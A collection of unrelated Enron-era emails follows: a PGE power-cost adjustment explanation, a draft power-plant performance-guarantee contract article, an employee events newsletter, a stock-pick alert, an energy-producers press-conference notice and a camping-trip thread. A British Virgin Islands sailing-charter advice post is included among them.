FYI -----Original Message----- From: Stevens, Kirk Sent: Wednesday, September 19, 2001 11:46 AM To: Mayeux, Gay Cc: Hayslett, Rod Subject: RE: PGE Power Costs Gay, here's the story and some numbers for the Q3 comparison. Please remember the context of our phone conversion this morning when looking at this. Hopefully this helps Investor Relations put the story together for the Earnings Release. Power Cost Adjustment We now expect to have an amount collectable from customers to record all Q3 of $86m. Since we we're basically at the deadband level at the end of Q2, we end up eating our way through the deadband and up into the 90% collection band all in Q3. On a stand alone basis, we will incur about $54m of net variable power costs Q3 that we won't have any revenues for (but remember to keep this in context for the entire 9-month period). The following shows how this is calculated: Projected Net Variable Power Costs = $316m Baseline for PCA = $176m Difference Subject to PCA Collection = $140 Deadband = $35m (no collection) 50/50 band = $21m (collect $10.5m, no collection = $10.5) 90/10 band = $84m (collect $75.5m, no collection = $8.5) The bands above = $140m ($35+21+84) Collections = $86m ($10.5+75.5) No Collection (PGE eats) = $54m ($35+10.5+8.5) Again, without the PCA mechanism and no other price increase between 1/1/01 and 9/30/01, PGE would be $90m worse off. As we discussed, before pulling our request for a rate increase to be effective 1/1/01 (which was replaced with the PCA mechanism), the latest amount being offered up by our PUC would have been around a $90m increase for the 9-month period (although the evidence was quickly moving towards no need for an increase, so we probably wouldn't have got the rate increase, and without a PCA, would have been worse off today). Quarter to Quarter Comparison - Margins As we discussed, things were looking really good for us through Q2 2001, but price caps and other factors in late Q2/early Q3 really dropped the price we could sell our excess power for, and accordingly has dropped our margins. In addition, a slowing economy and customer energy efficiency measures have resulted in significant reductions in our retail revenues compared to last year. Another point on the this year/last year quarter to quarter comparisons is that we went into Q3 2000 with length purchased at fairly low/reasonable costs over the prior year or so. In Q3 2000, wholesale sales prices increased dramatically (California market) so we made tremendous margins (above normal). Going into Q3 2001, much of the power we purchased was at higher prices than the previous year because of the higher wholesale power market operating over the past year. When price caps and other events dropped the bottom out of the wholesale power prices, our margins on our power lenght dropped dramatically. The PCA only picks up a power of this increase in net variable power costs, as outlined above. Also remember that we have a regulatory obligation to serve our customers, so we have to go into a month with length in order to ensure we can handle any potential load spikes or unplanned plant outages. Any excess power is sold in the wholesale market in the day-ahead or real-time markets. Big story, price caps and lower retail revenues have really hurt us year to year, but our new rate case effective 10/1/01 should get us back on track. Gross Margin Comparisons Based on our latest forecast, here's a breakdown of our gross margins on a year to year comparison for Q3. This gives you a high level look at the impact the above events have had on our margins year to year ($94m decrease in gross margin). Q3 2000 Q3 2001 Retail Revenues $257m $250m Wholesale Revenues 466m 571m Other Revenues 5m 5m Variable Power Costs 523m 715m Gross Margin $205m $111m Let me know if you have questions >>> "Mayeux, Gay" <[email protected]> 09/19/01 05:43AM >>> I will try again. Mine shows an attachment. Look at the very bottom of the email. Thanks! _________________________ Gay Mayeux Vice President, Investor Relations Enron Corp. 1400 Smith Street, EB 4931a Houston, Texas 77002 Phone: 713-853-9905 Cell: 713-416-8821 Fax: 713-646-3002 email: [email protected] -----Original Message----- From: Kirk Stevens [mailto:[email protected]] Sent: Tuesday, September 18, 2001 6:45 PM To: Mayeux, Gay Subject: Re: PGE Power Costs Gay, there wasn't an attachment >>> "Mayeux, Gay" <[email protected]> 09/18/01 03:24PM >>> Attached is my attempt to summarize the PGE power cost issue. Please call me to discuss. I have no pride of authorship - just want to make sure it is simple as possible while still being correct. I will be here until about 6:30 my time. Thanks! _________________________ Gay Mayeux Vice President, Investor Relations Enron Corp. 1400 Smith Street, EB 4931a Houston, Texas 77002 Phone: 713-853-9905 Cell: 713-416-8821 Fax: 713-646-3002 email: [email protected] ********************************************************************** This e-mail is the property of Enron Corp. and/or its relevant affiliate and may contain confidential and privileged material for the sole use of the intended recipient (s). Any review, use, distribution or disclosure by others is strictly prohibited. If you are not the intended recipient (or authorized to receive for the recipient), please contact the sender or reply to Enron Corp. at [email protected] and delete all copies of the message. This e-mail (and any attachments hereto) are not intended to be an offer (or an acceptance) and do not create or evidence a binding and enforceable contract between Enron Corp. (or any of its affiliates) and the intended recipient or any other party, and may not be relied on by anyone as the basis of a contract by estoppel or otherwise. Thank you. **********************************************************************
ARTICLE X. PERFORMANCE GUARANTEES AND ACCEPTANCE 10.1 Performance Guarantees. Seller guarantees that each Unit will meet the Performance Standards for Electrical Output, Efficiency, Water Consumption, Noise and Emissions as set forth in Section 10.2, when Performance Tests are conducted in accordance with the Performance Test Procedures. 10.2 Performance Standards. Each Unit shall meet Performance Standards as described in this Article and as set forth in the following table below in order to achieve Acceptance: 2MW Power Plants 2.4MW Power Plants 3.0 MW Power Plants Electrical Output, kW 2000 kW 2400 kW Heat Rate (LVH) 48% 48% Water Consumption 600 gal/h 620 gal/h Sound level 65 dB(A) at 100 feet 65 dB(A) at 100 feet Emissions Nox <1 ppmv <1 ppmv SOx <0.1 ppmv <0.1 ppmv CO <20 ppmv <20 ppmv VOC <20 ppmv <20 ppmv Particulates <100 mg/m3 <100 mg/m3 10.2.1 Heat Rate Guarantee. Seller guarantees that the Heat Rate as measured for each of the Units as demonstrated during the Performance Test, shall be __BTU/kWh. In the event the Heat Rate exceeds the Minimum Heat Rate Guarantee, Seller shall take all necessary actions to correct, retest the deficient Unit and cause the deficient Unit to meet the Minimum Heat Rate Guarantee. Failure to meet the Heat Rate Guarantee shall prevent Acceptance, unless Purchaser explicitly waives this guarantee in writing. 10.3.2 Electrical Output Guarantee. Seller guarantees that the Electrical Output of each Unit as demonstrated in the most recent Performance Test shall be equal or greater than 2000 kW (for a 2.0 MW Unit), 2400 kW (for a 2.4 MW) Unit, and 3000kW (for a 3.0 MW Unit). [Is this a net number? Where is it measured?] 10.3.3 Emissions Guarantee. Seller guarantees that the emissions of the [Unit] for the above listed categories when the [Unit] is operated [conditions?] 10.3.4 Water Consumption Guarantee. 10.3.5 [Sound Guarantee. Seller guarantees that the near field average A-weighted sound pressure levels of the [Unit? Facility?] shall not exceed 65dB(a) 9referenced to 20 micropascals) when measured during the Performance Test at one and a half (1.5) meters above the ground level and one (1) meter from the surface of the Equipment.] 10.3.6 Reliability. 10.4 Remedy for Failures to Meet Performance Guarantees. Except as specified in Section 10._] the failure to achieve the Performance Guarantees by the Acceptance Deadline [to be defined] shall constitute a default under this Agreement, and Purchaser shall have the remedies specified in Article []. 10.5 Testing. 10.5.1 Notice of Installation Completion; Conducting Tests. Seller shall deliver Notice to Purchaser that a Unit has achieved Installation Completion so that the Unit is ready to be tested. Within [fourteen (14) days] of receipt of this Notice, Purchaser shall perform the Performance Tests in accordance with the Performance Test Procedure; however, Purchaser shall not be required to conduct Performance Tests prior to [] days from the Delivery Date, or date of actual delivery, whichever is latest. Purchaser shall give Seller five (5) days notice of the time of the Performance Tests. Seller shall be present or to have a representative present at the Performance Tests, and shall provide technical advice during the tests; however, Purchaser may at its option conduct the test without Seller, assuming notice was properly given in accordance with this section. 10.5.2 Test Results. Performance Tests shall be conducted on a unit-by-unit basis. Upon the completion of each Performance Test Purchaser will issue a Performance Test Certificate setting forth the results achieved during such test. In the case of multiple Performance Tests on a Unit, performance shall be measured by the most recent Performance Test. 10.5.3 Costs of Retests. If one or more additional Acceptance Tests are required doe to the failure of a Unit to pass its Acceptance Test, Seller will bear the additional costs (if any) incurred by Purchaser [in excess of those costs normally associated with operating the Unit]. Such additional costs may include, but not be limited to, cost of testing, instrumentation, fuel, consumable spare parts, and additional personnel required to conduct the tests. 10.6 Acceptance. Upon the successful completion of the Performance Test for a Unit, Seller shall submit a Performance Test Certificate to Purchaser indicating that a Unit has achieved the Performance Standards and it ready for Acceptance. Purchaser shall within ten (10) days of receipt of such Performance Test Certificate, either sign such certificate acknowledging concurrence or reject such certificate specifically stating the reasons for such rejection. Acceptance for each Unit (and its associated Equipment) shall occur upon the issuance of the Performance Test Certificate by Purchaser as a result of the Unit having met the Performance Guarantees. Acceptance of the each Unit to be installed in a Facility shall occur when all of the following have occurred: (a) the issuance of a Performance Test Certificate by Purchaser as a result of a Performance Test indicating that the final Unit has met the Performance Standards; (b) all completion of training and the delivery of O & M Manuals and special tools required hereunder shall have occurred; (c) Seller has delivered to Purchaser a waiver of liens in form as shown in Exhibit-S that have been or could have been placed upon the Equipment and that there are no outstanding claims of Seller or any Vendor with respect to the Equipment for that particular Facility; (d) all of the Units in the Facility have achieved Installation Completion. [and there are no punch list items remaining to be completed.] 10.7 Obligation to Improve Performance. If the Performance Test should indicate that a Unit has met the Specific Performance Guarantees but not the Guaranteed Performance Criteria, then for a period of ninety (90) days following the Performance Test Seller shall have the obligation to use reasonable efforts to improve performance so that the Guaranteed Performance Criteria are met. Such efforts shall be at Seller,s sole cost and risk. Performance Tests shall be conducted in accordance with this Article. 10.8 Reduced Purchase Amount for Failing to Meet Guaranteed Performance Levels. Should the Performance Test of a Unit demonstrate that the Unit has met the Performance Standards except for the Electrical Output Performance Standard, the Purchase Amount related to that Unit shall be reduced by the percent by which the Unit fails to meet the Power Output/kW Performance Standard, so long as the Unit has achieved ninety percent of the guaranteed level. Seller shall within 30 days refund any prior payment received for the Unit in excess of the reduced Purchase Amount.
Enron Family Day at the Museum of Fine Arts, Houston Enron Family Day at the Museum of Fine Arts, Houston is this Saturday, May 12th from 10 AM - 7 PM. Enjoy the many exciting exhibits at the museum including Star Wars: Magic of Myth. Enron employees and their families can enter the museum free by presenting their Enron ID Badge. To visit the Star Wars: Magic of Myth exhibit, you can purchase vouchers for $10 each by calling (713) 639-7771 or you may use the vouchers previously distributed to employees by Enron. Do you hate to garden in the summer because everything you plant dies? Linda Gay, Director of the Mercer Arboretum and Botanic Gardens in Humble, will teach us about plants that not only survive, but thrive during the dog days of Houston summers. Topics will include tropical-looking plants for sun and shade, gingers, fragrant plants, and drought-tolerant plants. WHEN: Tuesday, May 8th, 11:30 a.m. - 12:30 p.m. WHERE: The Forum, 12th floor of 2 Allen Center Get ready to help the Body Shop celebrate it's 15th anniversary and kick-off National Health and Fitness Week. Beginning Monday, May 14 and ending Friday, May 18, 2001 all Enron Employees are invited to work-out at the Body Shop as a complimentary guest. Just visit http://hrweb.enron.com/wellness, print and fill-out the body shop 15th anniversary guest form, and return it to the Body Shop prior to your first workout. The week long celebration includes a speech and autograph session with Clyde Drexler, Monday, May 14, 2001, 11:30 AM-12:00 noon (spaces will be limited and you must RSVP to [email protected] by Friday, May 11, 2001, 3:00 PM); an early morning workout with the Houston Rockets Power Dancers on, Thursday, May 17, 2001 starting at 6:30 AM followed by breakfast and autograph session in the Body Shop Fuel Station at 7:30am - 8:30am; a boot camp style class led by the German/American Foreign Legion and much, much more. Visit the Body Shop website for a detailed calendar of events, or for additional information, please e-mail the Body Shop at [email protected]. The Enron Travel Club will hold it's monthly meeting on Tuesday, May 8th in room EB5C2 from 12:00pm - 1:00pm. Help people affected by arthritis. Join A Joint Walk on May 20. Thousands of greater Houstonians will join the walk to cure arthritis. The 5-mile walk begins at the Kelsey-Seybold Clinic and travels along Braes Bayou. Call 713-529-0800 and "get in step". Project Mom @ Friendly Haven on Saturday, May 11th.... in Honor of Mother's Day! Join Enron employees at Friendly Haven, a housing assistance program supported by AFH (AIDS Foundation Houston), for a volunteer project designed to celebrate Mother's Day. Approximately 40 single mothers comprise Friendly Haven's residents and we would like to make the day special for both them and their children. Enron volunteers are needed to facilitate a children's craft activity for Mother's Day presents and also serve a special brunch to all of the mothers in the program. This project can be utilized as a team building opportunity for a department with 15 - 25 employees or individual volunteers may sign up by contacting Janice Riedel at x37507 - for more information on AFH, visit http://www.aidshelp.org/programs/housing.htm. The Contemporary Arts Museum needs volunteers to help with CAM*boree, a special event for kids Sunday May 20, 5:00pm to 8:00pm. There will be a picnic dinner, music and artist-led activities. Volunteers will help play with the kids, ages 2-12. It is so much fun and a short time commitment. Volunteers get a FREE Museum membership as a thank you. Please respond by May 16 to Jennifer Milligan X35272. Support KidSave and Help Miracles Happen. Every Summer. Kidsave's Summer Miracles Program enables orphanage children ages 5 to 11 to travel to the US and Canada, live with families and attend day camp. The program gives families who may be concerned about the problems of adopting an older child a chance to meet, get to know and in the best-case scenario, fall in love with a child. The program gives prospective parents an opportunity to see and evaluate first-hand the challenges and rewards of adopting an older child. In 1999 and 2000 Kidsave and adoption agency partners placed 432 children - 96 percent of children who participated in the program. Generally, 85 to 90 percent of children who participate in the program find homes easily through the program. The remaining 10 to 15 percent require more work. Kidsave believes every child deserves a family. We are committed to placing all children who participate in the Summer Miracles Program in permanent families or family-like environments. We are looking for families to host children, and for others who want to help us make the camp program happen for these 250 children. As a non-profit organization, Kidsave depends on donations to raise the money to bring these children here and find them families. Please call Tonya Hoppe at 281.286.8948 or [email protected] to get involved in Houston's Kidsave program. Enron and Kidventure Camps are proud to bring you Camp Enron Summer 2001. Celebrating our third year, Camp Enron will once again be providing summer camp for children, ages 5-13, of Enron employees and contractors. This year, camp will be May 29-August 10. Ten, one-week sessions will be available and families may choose to attend any or all sessions. Each camp week is Monday through Friday. The cost is $150 per week and includes all transportation, field trips and activities. A deposit of $50 per week is all that is needed to reserve your sessions. To register, log on to: http://www.kidventurecamp.com/camp_enron.htm. Spaces are limited. Enron parents simply ride to work with their children and check them in to the Energizer room in the morning with the Camp Enron Team. Enron Campers are loaded on Coach USA Buses and transported to our nearby camp. At the end of the day campers are brought back to the Energizer for parents to check out. It's that easy! For more information please contact: web site: www.kidventurecamp.com call Kidventure: 713.960.8989 e-mail: [email protected] Have News to Share? To post news or events in Enron In Action, please e-mail your information to [email protected] no later than 12:00 noon the Thursday prior to the next Monday's mailing.
I've chartered in the BVI a number of times and it is a great place to take beginners. I only caught your post of yesterday so didn't see the earlier thread. I'm assuming you're picking up the boat in Road Town or nearby. The only problem with getting away from the dock by 12 or so is if the boat isn't quite ready. I've always used the Moorings so they're the only outfit I know. They don't usually let you get started on the boat until after the chart briefing which means you don't go aboard until 10. If you use their provisioning service it eases that chore but sometimes the food isn't there right on time. Having several people (but not too many) around this time is helpful to put food away, take inventory, attend boat briefing, etc. Of course, if you get the boat the day before - maybe with a sleepaboard option or some such, you have that much more certainty that everything will be done on time. Check with your charter company about attending the briefings before sending the last person off to the airport - some companies may require 2 people from your boat to attend. As for first day - if you are away by 1 I suggest heading over to the Bight on Norman Island. There are lots of moorings there and you'll get one as long as you're not in too late. It shouldn't take more than a few hours to get there and if it looks like it might be close you can always fire up the engine. There are a couple of places (a beach bar and a boat) to eat and drink there if you don't feel like cooking the first night and although you can't call it deserted or even secluded because of the number of boats there, there is at least very little ashore to bother you. The caves are just around the corner and the Indians right outside for great snorkeling/diving either that afternoon or first thing the next day. Whether you go clockwise or counterclockwise doesn't really matter. My advice running roughly clockwise: skip Soppers Hole - just a commercial port with little of interest (unless you're clearing customs); skip the USVI - all the clearing out & in & out & in can take a lot of time and there's plenty to do in the BVI - if you just have to go, the northern shore of St. John is the best - nice anchorages (several of the 'secluded' variety) without the crime on St. Thomas and the resort at Caneel Bay will let you come ashore for a fancy dinner (but make reservations and leave your trash on board - there's nowhere to put it); Jost van Dyke is fun - anchor in Great Harbor or pick up a mooring in Little Harbor - Sydney's Peace & Love restaurant in Little Harbor still has an honor bar where you mix your own drinks & just keep track in his little black book while you're waiting for dinner, Foxie's in Great Harbor is a classic beach bar/rest. - lots of fun and good food & drinks; Sandy Cay is everyone's image of a desert island and perfect for a lunch stop and a swim; don't miss Cane Garden Bay (unless the northerly swell is too heavy) there's a wonderful swath of pure white beach with palm trees swaying overhead and steel drum bands serenade you into the evening - watch the reefs but the channel in is well marked; if there's a full moon be sure to be on Tortola somewhere that night (Cane Garden works fine) to get to Bomba's Shack for the party - there are lots of taxis there as the evening progresses to get you back; it's easy to pick people up (or drop them off) at the airport (close to the water with a dinghy dock) midweek if you need to and kind of fun to be met that way; the Baths are a must but VERY crowded (no anchoring allowed - must use a mooring) so I'd try to get there as early in the day as possible (Cooper Island, Marina Cay and area by Last Resort are nearby for the night before) - maybe get up early, motor or sail over and have breakfast once you're safely moored - and be careful to use the right color mooring and avoid the ones reserved for commercial craft; I usually skip Spanish Town (Virgin Gorda Yacht Harbor) since I'd rather be at anchor than stuck in a marina slip with no breeze, but if you stay there you can get a taxi to the Baths and top off with water in case your crew is not serious enough about fresh water conservation (and what crew ever is?); the Bitter End is great for a long hot shower (I think you pay at the resort front desk) and maybe a 'fancy' dinner and there is also a water dock there (10 cents a gal.?). Sometimes it seems like the distances are so short you don't get to sail enough - you shouldn't have any trouble getting a lot in (but you won't be able to see everything). The only difficulty might be if you need to get the boat back in for an early flight but I've let people out at Cane Garden Bay to take a taxi to the early flight & then sailed around to have the boat back well before noon. Having said that, I suggest Cooper Island or the Bight for your last night - it just makes that last morning a bit more leisurely. And just as I mentioned for the first night, it makes sense to get into most anchorages early rather than late so you're sure to get a mooring (in those that have them) and don't have to worry about finding a spot for the boat - many of them can get quite crowded. Of course, if you're going anytime between now and Thanksgiving there shouldn't be any trouble with crowds - just pay daily, close attention to the weather forecasts! Don't expect much in the way of night life but there are places to eat at nearly every anchorage - many are closed in the low season. A few of the islands have some good hiking but there's not much for the sight seers either. But snorkeling and diving are everywhere. Ask at your chart briefing for the best spots these days. If you have divers along, don't miss the wreck of the Rhone - you can have a dive boat come and meet you there and bring along equipment and a guide for the divers. The cruising guide will have lots of info on all these issues. Wish I was going - it's always a blast!
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Replies should be made via the underlined "Reply" link above. <http://clearstation.etrade.com/images/spacer.gif> <http://clearstation.etrade.com/images/spacer.gif> 'kensey' has recommended GNSS (Long) at Jan 10 2002 4:09AM Genesis Microchip (NASDAQ:GNSS) Symbol Last Time Change High Low Volume GNSS <http://clearstation.etrade.com/cgi-bin/details?Symbol=GNSS> 72.51 5:16PM 2.96 74.90 70.45 4,184,200 Community Take <http://clearstation.etrade.com/cgi-bin/bbs/Individual_Stocks/GNSS/Recommend> 86 Long / 36 Short <http://clearstation.etrade.com/i/3366cc.gif> 'kensey' said: Thu Jan 10 01:05:04 2002 GNSS as a long candidate. GNSS gaps over resistance at 70 so the move constitutes a breakout. BRCM did the same thing today taking resistance at 50. a close beneath the 13-day EMA constitutes the roving cautionary flag as GNSS has had an excellent relationship with the 13-day EMA since the green bar birthed in november. GNSS has not closed beneath the 13-day EMA since. so the 13-day EMA is the yardstick. waiting i am for the next julianna hatfield concert! unfortunately the best thing to be had at the local casino of choice is Styx. kensey Click here <http://clearstation.etrade.com/cgi-bin/bbs?Cmd=post&post_id=2822414> to see the full recommendation with annotated graph <http://clearstation.etrade.com/i/3366cc.gif> <http://clearstation.etrade.com/i/blank_circ.gif> <http://clearstation.etrade.com/i/blank_circ.gif> <http://clearstation.etrade.com/i/blank_circ.gif> <http://clearstation.etrade.com/images/s.gif> kensey's RecommendList <http://clearstation.etrade.com/cgi-bin/drill_open_positions?Event=open&PortfolioName=recommend&usernm=kensey> Reply <http://clearstation.etrade.com/cgi-bin/post?forum_id=1&Cmd=add&post_id=2822414&usernm=&> Unsubscribe <http://clearstation.etrade.com/doc/unsub_kensey.html> ClearStation is not an investment advisory service, nor a registered investment advisor or broker-dealer and does not purport to tell or suggest which securities members should buy or sell for themselves. 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Two things: 1. I called Smutney last week re this press conference and declined. I said that the idea is fine and we support it, but Enron does not want to participate in a press conference with other generators on this topic. 2. I just talked to Rob Lamkin of Southern who indicated that ten companies have gotten letters from Gov Davis addressed to "Dear CEO of Energy Company." Letter was to invite these companies to attend a meeting on Monday, December 1 in LA. Agenda and issues to follow, but Rob thought it had to do with the Gov's plan for CA due 12/1. Meeting will not be with Davis, but with his staff. Southern is deciding who to send. Reliant will send John Stout and Curtis Keebler. Williams got a letter, but no info re their rep. Rob was calling to see if we got a letter and, if we did, out thoughts re meeting before the Gov's meeting to discuss. I said we could have gotten a letter, but I did not know. ----- Forwarded by David Parquet/SF/ECT on 11/21/2000 04:38 PM ----- "Katie Kaplan" <[email protected]> 11/21/2000 04:07 PM Please respond to kaplan To: <[email protected]>, <[email protected]>, "'John Stout for Reliant'" <[email protected]>, "'Curtis Keebler at Reliant'" <[email protected]>, "'Julie @ Edson'" <[email protected]>, "'Paula Hall-Collins'" <[email protected]>, "'Marty Wilson'" <[email protected]>, "'Rob Lamkin'" <[email protected]>, "Karen Edson" <[email protected]>, "Bob Weisenmiller" <[email protected]>, "Sue Mara" <[email protected]>, "Andy Brown" <[email protected]>, "B Brown Andy" <[email protected]>, "Bob Escalante" <[email protected]>, "Greg Blue" <[email protected]>, "Jack Pigott" <[email protected]>, "Jan Smutny-Jones" <[email protected]>, "Joe Ronan" <[email protected]>, "Karen Denne" <[email protected]>, "Karen Edson" <[email protected]>, "Kassandra Gough" <[email protected]>, "Kristin Vellandi" <[email protected]>, "Lynn Lednicky" <[email protected]>, "McNally Ray" <[email protected]>, "Paula Hall-Collins" <[email protected]>, "Richard Hyde" <[email protected]>, "Rob L. Lamkin" <[email protected]>, "Stephanie-Newell" <[email protected]>, "Tom Ross" <[email protected]>, "William Hall" <[email protected]>, "Trond Aschehoug" <[email protected]>, "Tony Wetzel" <[email protected]>, "Susan J Mara" <[email protected]>, "Steve Ponder" <[email protected]>, "Steve Iliff" <[email protected]>, "Scott Noll" <[email protected]>, "Roger Pelote" <[email protected]>, "Rob Lamkin" <[email protected]>, "Randy Hickok" <[email protected]>, "Paula Soos" <[email protected]>, "Marty McFadden" <[email protected]>, "Lynn Lednicky" <[email protected]>, "Kent Fickett" <[email protected]>, "Ken Hoffman" <[email protected]>, "Jonathan Weisgall" <[email protected]>, "Joe Ronan" <[email protected]>, "Joe Greco" <[email protected]>, "Jim Willey" <[email protected]>, "Jeff Dasovich" <[email protected]>, "Jack Pigott" <[email protected]>, "Hap Boyd" <[email protected]>, "Greg Blue" <[email protected]>, "Frank DeRosa" <[email protected]>, "Eileen Koch" <[email protected]>, "Ed Tomeo" <[email protected]>, "Duane Nelsen" <[email protected]>, "Dean Gosselin" <[email protected]>, "Dave Parquet" <[email protected]>, "Curtis Kebler" <[email protected]>, "Curt Hatton" <[email protected]>, "Cody Carter" <[email protected]>, "Carolyn Baker" <[email protected]>, "Bob Escalante" <[email protected]>, "Bill Woods" <[email protected]>, "Bill Carlson" <[email protected]>, "Eric Eisenman" <[email protected]> cc: "Jan Smutny-Jones" <[email protected]>, "Steven Kelly" <[email protected]>, "Susan McCabe" <[email protected]>, "Scott Govenar" <[email protected]>, "Ron Tom" <[email protected]>, "Robert Ross" <[email protected]>, "Phil Isenberg" <[email protected]>, "Mike Monagan" <[email protected]>, "Maureen OHaren" <[email protected]>, "Marie Moretti" <[email protected]>, "Kassandra Gough" <[email protected]>, "Hedy Govenar" <[email protected]>, "Delany Hunter" <[email protected]>, "Bev Hansen" <[email protected]>, "Anne Kelly" <[email protected]>, "Jenn Paulsen" <[email protected]>, "Jamie Parker" <[email protected]> Subject: Press Conference Greetings: IEP will be holding a press conference on Tuesday November 28 at 10:30 a.m. in the Governors Press room to discuss the importance of long-term fixed (that term is easier to understand than bilateral) contracts. IEP will be stressing the importance of the contracts as part of the solution for next summer. Several IEP members have offered (and have continued to offer) long-term fixed contracts at terms under the current retail rate freeze. We will indicate that the utilities have been hesitant to enter into these contracts due to the uncertain nature of the CPUC. We will point out that several different independent entities have agreed that long-term contracts are one of the key solutions and that the PUC should act immediately to set a benchmark and in so doing eliminate the reasonableness review that is the main barrier for IOU's not entering into large long-term fixed contracts. IEP is also currently working to include other market participants in the Press Conference. We would like as many IEP participants as possible at the conference to show that there are several companies who continue to be serious about long-term fixed price contracts. We have already received a couple of responses and if you are interested please let me know ASAP-no later than noon Wednesday- as we are sending out an advisory on Monday. Thank you for your attention to this matter. Katie Kaplan Manager of State Policy Affairs Independent Energy Producers Association (916) 448-9499
I also have a small tent that can be borrowed if "the silent one" emerges from the depths of the legal system to join us on our quest for physical pain, inebriation, and large, uncontrollable fires. -----Original Message----- From: Ebner, Daniel [mailto:[email protected]] Sent: Tuesday, December 12, 2000 10:35 AM To: Scott Palmer; 'Luis Gasparini'; '[email protected]'; '[email protected]' Subject: RE: This weekend Clint has spoken for the tent. > -----Original Message----- > From: Ebner, Daniel > Sent: Tuesday, December 12, 2000 10:28 AM > To: 'Scott Palmer'; 'Luis Gasparini'; [email protected]; > [email protected] > Subject: RE: This weekend > > Does everybody have a tent. I can bring an extra SMALL tent if needed? > > -----Original Message----- > From: Scott Palmer [SMTP:[email protected]] > Sent: Tuesday, December 12, 2000 8:24 AM > To: 'Luis Gasparini'; Ebner, Daniel; [email protected]; > [email protected] > Subject: RE: This weekend > > > I'm in for that. > > BTW - pack a change of warm clothes, and I'd suggest some kind of > light > nylon coat. It might drizzle that day. > > -----Original Message----- > From: Luis Gasparini [mailto:[email protected]] > Sent: Monday, December 11, 2000 4:37 PM > To: Ebner, Daniel; Scott Palmer; [email protected]; > [email protected] > Subject: RE: This weekend > > > Do you guys want to go in on some New York Strip steaks? I can pick > up some > in bulk at Sam's and marinade them over night. There are usually 4 > eight to > ten ounce steaks per package for around $20. They are pretty good > quality. > > If we do it, should I get one or two packages? I'm thinking two > (unless > Scott is bringing Hunter, who we can BBQ instead). > > -----Original Message----- > From: Ebner, Daniel [mailto:[email protected]] > Sent: Monday, December 11, 2000 3:00 PM > To: 'Scott Palmer'; Ebner, Daniel; '[email protected]' > Cc: '[email protected]'; '[email protected]' > Subject: RE: This weekend > > > Sounds good to me. 5 o'clock. Just kidding. > > > -----Original Message----- > > From: Scott Palmer [SMTP:[email protected]] > > Sent: Monday, December 11, 2000 3:02 PM > > To: 'Ebner, Daniel'; '[email protected]' > > Cc: '[email protected]'; '[email protected]' > > Subject: RE: This weekend > > > > > > So did we get a consensus on the time? > > > > -----Original Message----- > > From: Ebner, Daniel [mailto:[email protected]] > > Sent: Monday, December 11, 2000 2:54 PM > > To: Scott Palmer; '[email protected]' > > Cc: '[email protected]'; '[email protected]' > > Subject: RE: This weekend > > > > > > I think I'd have a short position in camp fire wood. I see the > intrinsic > > value spiking upward (due to need for warmth) then crashing down > (as it > > turns to ash). > > > > However, I'm always long Beam. > > > > > -----Original Message----- > > > From: Scott Palmer [SMTP:[email protected]] > > > Sent: Monday, December 11, 2000 2:47 PM > > > To: '[email protected]' > > > Cc: 'Ebner, Daniel'; '[email protected]'; > > > '[email protected]' > > > Subject: RE: This weekend > > > > > > > > > Not so fast, Clint.... for $4.50 you just get the wood, you > don't get an > > > option to kick the wood. > > > > > > I'm writing December Wood-kicking calls for $1, who's > buying....? > > > > > > -----Original Message----- > > > From: [email protected] [mailto:[email protected]] > > > Sent: Monday, December 11, 2000 2:37 PM > > > To: Scott Palmer > > > Cc: 'Ebner, Daniel'; '[email protected]'; > > > '[email protected]' > > > Subject: RE: This weekend > > > > > > > > > > > > Wow, the wood I can kick!!! > > > > > > > > > > > > > > > Scott Palmer <[email protected]> on 12/11/2000 02:34:59 PM > > > > > > To: "'Ebner, Daniel'" <[email protected]>, > "'[email protected]'" > > > <[email protected]>, "'[email protected]'" > > > <[email protected]>, "'[email protected]'" > > > <[email protected]> > > > cc: > > > > > > Subject: RE: This weekend > > > > > > > > > > > > All right - I did the unthinkable, and bought a "half-cord" of > wood. > > For > > > the uninitiated, a half-cord is a stack of roughly 18- to > 24-inch logs > > > that > > > is 8 feet long and 4 feet high. > > > > > > I'm going to bring about half of it camping, so we should have > quite the > > > fire. > > > > > > -----Original Message----- > > > From: Ebner, Daniel [mailto:[email protected]] > > > Sent: Monday, December 11, 2000 1:55 PM > > > To: Scott Palmer; '[email protected]'; > '[email protected]'; > > > '[email protected]' > > > Subject: RE: This weekend > > > > > > > > > Richard, are you coming. You've been awful quite throughout > this. > > > > > > I think I can scrape together 500 pennies. > > > > > > > -----Original Message----- > > > > From: Scott Palmer [SMTP:[email protected]] > > > > Sent: Monday, December 11, 2000 12:50 PM > > > > To: 'Ebner, Daniel'; '[email protected]'; > > > '[email protected]'; > > > > '[email protected]' > > > > Subject: RE: This weekend > > > > > > > > > > > > OK, I can get some firewood. I assume we're going to need > quite a > > bit, > > > > since we tend to build a pretty big fire every year. > > > > > > > > Can I assume that I can get $5 from everybody to help cover > the cost > > of > > > > the > > > > wood? > > > > > > > > The place is easy, there's pretty much only one area to tent > camp. > > I'd > > > > say > > > > first ones there claim a good site. It's been getting dark > around > > 5:00 > > > > lately, so I'd say we need to get there before noon if we're > going to > > > get > > > > a > > > > decent ride in and be able to pitch tents before it gets dark. > > > > > > > > That'll mean an early morning for the Dallas guys.... sorry > bout that. > > > > > > > > -----Original Message----- > > > > From: Ebner, Daniel [mailto:[email protected]] > > > > Sent: Monday, December 11, 2000 11:48 AM > > > > To: Scott Palmer; '[email protected]'; > '[email protected]'; > > > > '[email protected]' > > > > Subject: This weekend > > > > > > > > > > > > I did some looking for firewood around Coppell this weekend. > Short of > > > the > > > > crap you get from Albertson's that burns up in about 15 > minutes, I > > could > > > > not > > > > find any. This week, I've got something every night so I > can't shop > > for > > > > it. > > > > > > > > Can someone be in charge of getting firewood? It's usually > best to > > get > > > > from > > > > an actual firewood supplier that usually has trucks on the > side of the > > > > road. > > > > Nursuries sometimes have it also. We can split up the cost > later. > > > > > > > > I'm pretty much planning on showing up with my tent, sleeping > stuff, > > > food, > > > > Beam, bike, and lanterns. Is there anything else I need to > bring? > > > > > > > > Also, what time, and where in the park are we meeting? > > > > > >
